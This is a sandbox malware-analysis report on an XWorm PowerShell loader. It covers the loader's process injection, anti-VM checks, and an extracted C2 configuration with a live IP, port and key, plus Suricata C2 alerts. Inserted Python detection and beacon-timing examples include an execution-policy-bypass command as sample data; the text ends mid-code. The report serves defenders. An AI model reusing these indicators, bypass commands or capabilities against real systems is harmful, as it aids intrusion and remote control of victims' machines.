
Windows Analysis Report
b.ps1

Overview

General Information

Sample name:b.ps1
Analysis ID:1599699
MD5:b5008db49b4ac5e668451b9a34ce2b76
SHA1:820ebe8c35bf4c57e1e439e4b10cee8186c444d3
SHA256:7367d1b56aca0b585cef8466d8d9a83dac03f0e6d81f9e89567c10a2cc44a4bc
Tags: 176-113-115-228, booking, ps1, user-JAMESWT_MHT

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Classification categories (radar chart): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Verdict scale: clean, suspicious, malicious.
  • System is w10x64
  • powershell.exe (PID: 3716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 3788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 880 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • wermgr.exe (PID: 7140 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3716" "2640" "2540" "2656" "0" "0" "2660" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
{
  "C2 url": [
    "176.113.115.228"
  ],
  "Port": 4412,
  "Aes key": "P0WER",
  "SPL": "<Xwormmm>",
  "Install file": "USB.exe"
}
Source | Rule | Description | Author
00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xd1da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd277:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xd38c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xcf1c:$cnc4: POST / HTTP/1.1
00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x49342:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x493df:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x494f4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x49084:$cnc4: POST / HTTP/1.1
(memory-dump table truncated in this extract; the full report lists 6 entries)
Source | Rule | Description | Author
0.2.powershell.exe.1dd90374f68.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.powershell.exe.1dd90374f68.2.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x92a1:$str01: $VB$Local_Port
  • 0x92c5:$str02: $VB$Local_Host
  • 0x7702:$str03: get_Jpeg
  • 0x7c98:$str04: get_ServicePack
  • 0xa2c0:$str05: Select * from AntivirusProduct
  • 0xaafa:$str06: PCRestart
  • 0xab0e:$str07: shutdown.exe /f /r /t 0
  • 0xabc0:$str08: StopReport
  • 0xab96:$str09: StopDDos
  • 0xac8c:$str10: sendPlugin
  • 0xad0c:$str11: OfflineKeylogger Not Enabled
  • 0xae64:$str12: -ExecutionPolicy Bypass -File "
  • 0xb401:$str13: Content-length: 5235
0.2.powershell.exe.1dd90374f68.2.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xb5da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xb677:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xb78c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xb31c:$cnc4: POST / HTTP/1.1
0.2.powershell.exe.1dd8f552668.4.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.powershell.exe.1dd8f552668.4.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x92a1:$str01: $VB$Local_Port
  • 0x92c5:$str02: $VB$Local_Host
  • 0x7702:$str03: get_Jpeg
  • 0x7c98:$str04: get_ServicePack
  • 0xa2c0:$str05: Select * from AntivirusProduct
  • 0xaafa:$str06: PCRestart
  • 0xab0e:$str07: shutdown.exe /f /r /t 0
  • 0xabc0:$str08: StopReport
  • 0xab96:$str09: StopDDos
  • 0xac8c:$str10: sendPlugin
  • 0xad0c:$str11: OfflineKeylogger Not Enabled
  • 0xae64:$str12: -ExecutionPolicy Bypass -File "
  • 0xb401:$str13: Content-length: 5235
(unpacked-PE table truncated in this extract; the full report lists 10 entries)

            System Summary

Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", ProcessId: 3716, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", ProcessId: 3716, ProcessName: powershell.exe
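The two report findings above that a responder would want to reproduce outside the sandbox are the Sigma hit on the insecure `-ExecutionPolicy` switch and the C2 host/port pair from the extracted configuration. The following is an added example, not Joe Sandbox code and not the published Sigma rule: a simplified re-implementation of both checks over hand-constructed process and flow events. The command line and the configuration values are copied from the report; the abbreviation handling for `-ExecutionPolicy` (`-ep`, or any prefix of two or more letters such as `-ex`/`-exec`) mirrors what powershell.exe accepts, and the "raw IP without DNS" heuristic is this example's own choice.

```python
"""Triage checks for the XWorm sample, as an added example (not sandbox code).

  1. powershell.exe started with an insecure -ExecutionPolicy value
     (simplified form of the "Change PowerShell Policies to an Insecure
     Level" detection), and
  2. a network flow matching the C2 host and port from the extracted
     config, additionally flagged when no DNS lookup preceded it.

Sample events below are constructed for this example; the command line and
the configuration are copied from the report.
"""
import json
import ntpath
import shlex
from dataclasses import dataclass

# Configuration exactly as the sandbox extracted it.
XWORM_CONFIG = json.loads("""{
  "C2 url": ["176.113.115.228"],
  "Port": 4412,
  "Aes key": "P0WER",
  "SPL": "<Xwormmm>",
  "Install file": "USB.exe"
}""")

POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
INSECURE_POLICIES = {"bypass", "unrestricted"}


def split_cmdline(cmdline: str) -> list:
    """Tokenise a Windows command line, keeping backslashes literal."""
    try:
        return [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        return cmdline.split()


def execution_policy(cmdline: str):
    """Return the ExecutionPolicy value (lower-cased) passed to powershell.exe,
    or None. Accepts the abbreviations powershell.exe accepts: -ep, or any
    prefix of -ExecutionPolicy of at least two letters (-ex, -exec, ...).
    A lone -e is EncodedCommand and is deliberately not matched."""
    tokens = split_cmdline(cmdline)
    for switch, value in zip(tokens, tokens[1:]):
        if not switch.startswith(("-", "/")):
            continue
        key = switch[1:].lower()
        if key == "ep" or (len(key) >= 2 and "executionpolicy".startswith(key)):
            return value.lower()
    return None


def check_process(cmdline: str) -> list:
    """Alerts raised by one process-creation event."""
    tokens = split_cmdline(cmdline)
    if not tokens or ntpath.basename(tokens[0]).lower() not in POWERSHELL_HOSTS:
        return []
    policy = execution_policy(cmdline)
    if policy in INSECURE_POLICIES:
        return [f"powershell started with -ExecutionPolicy {policy}"]
    return []


@dataclass(frozen=True)
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str = "TCP"
    dns_seen: bool = True  # was dst resolved by a DNS query beforehand?


def check_flow(flow: Flow, config: dict = XWORM_CONFIG) -> list:
    """Alerts raised by one network flow against the extracted config."""
    alerts = []
    if flow.dst in set(config["C2 url"]):
        if flow.dport == config["Port"]:
            alerts.append(f"{flow.proto} to XWorm C2 {flow.dst}:{flow.dport}")
        else:
            alerts.append(f"{flow.proto} to known C2 host {flow.dst} on port {flow.dport}")
    if not flow.dns_seen and flow.dport not in (80, 443):
        alerts.append(f"{flow.proto} to raw IP {flow.dst}:{flow.dport} without DNS query")
    return alerts


# Constructed events resembling the report (first command line copied verbatim).
SAMPLE_PROCESSES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo '
    r'-ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1"',
    r'powershell.exe -ep bypass -w hidden -c "iex (gc x.txt)"',
    r'C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'powershell.exe -NoProfile -Command Get-Date',
]
SAMPLE_FLOWS = [
    Flow("192.168.2.5", 49709, "176.113.115.228", 4412, dns_seen=False),
    Flow("192.168.2.5", 49710, "176.113.115.228", 80, dns_seen=False),
    Flow("192.168.2.5", 49711, "20.190.160.1", 443, dns_seen=True),
]


def triage(processes=SAMPLE_PROCESSES, flows=SAMPLE_FLOWS) -> list:
    """Run both checks; return (event, alert) pairs."""
    findings = [(cmd, a) for cmd in processes for a in check_process(cmd)]
    findings += [(repr(f), a) for f in flows for a in check_flow(f)]
    return findings


if __name__ == "__main__":
    for event, alert in triage():
        print(f"[!] {alert}\n    {event}")
```

In production the process check should key on the image name from the event (OriginalFileName in Sysmon/Windows 4688), not on the command line's first token, since the token can be spoofed; the flow check is only as good as the config, so re-extract it per sample rather than reusing the values shown here.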
Suricata alerts, SID 2852870 (ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes), server -> client:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-26T10:34:28.769948+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:34:36.918088+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:34:40.555436+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:34:52.350845+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:04.163753+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:06.917867+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:15.963703+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:25.653662+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:25.854717+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:26.619507+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:31.488042+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:31.901153+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:36.906588+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:41.125293+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:52.921008+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:35:56.558294+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:03.438235+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:03.562563+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:03.688443+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:03.811883+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:03.934237+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:06.915056+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:08.851433+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:08.974394+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:09.104641+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:09.576639+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:22.254524+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:22.255919+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:22.256062+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:22.256207+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:22.472568+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:24.397558+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:34.555246+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:35.219704+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:36.902304+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:47.007422+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:36:58.808052+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:37:04.368257+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:37:06.917682+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:37:07.432087+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:37:11.273258+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:37:23.070700+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:37:31.646275+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:37:31.767760+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:37:36.936336+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
2025-01-26T10:37:43.523152+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
Suricata alerts, SID 2852923 (ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)), client -> server:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-26T10:34:28.814226+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:34:40.558655+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:34:52.357325+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:35:04.166179+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:35:15.967787+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:35:25.655476+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:35:25.864086+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:35:26.643517+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:35:31.490610+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:35:31.946435+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:35:41.127120+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:35:52.923666+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:35:56.564382+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:03.442442+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:03.564213+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:03.689951+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:03.820321+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:03.942247+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:08.857621+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:08.976077+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:09.106351+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:09.578400+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:22.257763+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:22.474521+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:24.399249+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:34.559337+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:35.221750+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:47.011390+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:36:58.809874+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:37:04.373284+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:37:07.434211+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:37:11.275725+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:37:23.204297+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:37:31.648147+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:37:31.769145+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
2025-01-26T10:37:43.537690+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
Suricata alerts, SID 2858801 (ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound), server -> client:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-26T10:34:36.918088+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
Suricata alerts, SID 2858799 (ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound), client -> server:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-26T10:36:24.180863+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
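The client-side alert timestamps above are worth more than a count: they mix a steady check-in cadence with sub-second bursts (for example the five alerts between 10:36:03.44 and 10:36:03.94), so a plain average of the gaps between alerts would misstate the beacon period. The following is an added example, not part of the sandbox report, that computes the inter-arrival times per flow, bins them into one-second buckets and reports the fullest bucket as the beacon interval together with its jitter. The twelve timestamps are copied from the SID 2852923 table; the flow key (src, dst, dport) and the one-second bin width are this example's choices.

```python
"""Beacon-interval estimate from Suricata alert timestamps (added example).

Heartbeats and command bursts share one TCP flow, so the median or mean of
the inter-arrival times is dominated by whichever happens to be more
frequent. Histogramming the deltas and taking the fullest bin isolates the
periodic component. Timestamps are copied from the report's alert table;
the flow key and bin width are choices made for this example.
"""
from collections import Counter, defaultdict
from datetime import datetime
from statistics import median

# (timestamp, src, sport, dst, dport): the first twelve client alerts.
OUTBOUND_CHECKINS = [
    ("2025-01-26T10:34:28.814226+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:34:40.558655+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:34:52.357325+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:35:04.166179+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:35:15.967787+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:35:25.655476+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:35:25.864086+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:35:26.643517+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:35:31.490610+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:35:31.946435+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:35:41.127120+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
    ("2025-01-26T10:35:52.923666+0100", "192.168.2.5", 49709, "176.113.115.228", 4412),
]


def parse_ts(ts: str) -> datetime:
    """Parse the report's timestamp format (microseconds, numeric UTC offset)."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def inter_arrivals(events) -> dict:
    """Seconds between consecutive alerts, grouped by (src, dst, dport).
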